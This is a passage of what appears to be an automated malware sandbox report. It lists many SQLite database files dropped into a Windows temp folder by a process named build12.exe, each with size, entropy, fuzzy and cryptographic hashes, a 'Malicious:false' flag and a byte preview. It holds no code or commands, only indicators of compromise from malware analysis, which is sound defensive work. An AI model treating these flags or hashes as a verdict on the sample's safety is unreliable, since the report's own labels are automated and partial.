                                                                                                                                                                                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmp71DB.tmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000187001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):51200
                                                                                                                                                                                                                                      Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmp71FB.tmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000187001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):51200
                                                                                                                                                                                                                                      Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmp720C.tmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000187001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):51200
                                                                                                                                                                                                                                      Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmp722C.tmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000187001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):51200
                                                                                                                                                                                                                                      Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmp730F.tmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):106496
                                                                                                                                                                                                                                      Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmp733F.tmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):106496
                                                                                                                                                                                                                                      Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmp735F.tmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):106496
                                                                                                                                                                                                                                      Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmp984A.tmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000187001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                      Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmp987A.tmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000187001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):98304
                                                                                                                                                                                                                                      Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmp9C0F.tmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                      Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmp9C2F.tmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                      Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmp9C40.tmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                      Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmp9C60.tmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                      Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmp9CB.tmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                      Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmp9EC.tmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                      Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmpA3A5.tmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000187001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):106496
                                                                                                                                                                                                                                      Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmpA3E3.tmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):106496
                                                                                                                                                                                                                                      Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmpA403.tmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):106496
                                                                                                                                                                                                                                      Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmpA40A.tmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000187001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):51200
                                                                                                                                                                                                                                      Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
